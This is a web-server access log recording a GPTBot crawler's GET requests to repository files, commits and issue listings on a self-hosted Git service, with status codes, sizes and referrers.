"/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11203] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11722] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" +[17/Feb/2026:17:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13738] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13425] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11412] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11382] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" +[17/Feb/2026:17:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" +[17/Feb/2026:17:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" +[17/Feb/2026:17:48:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:48:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9850] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:48:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11619] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:17:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fcompile_commands.json" [Client 74.7.227.38] [Length 25186] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:17:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11298] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11292] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11299] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 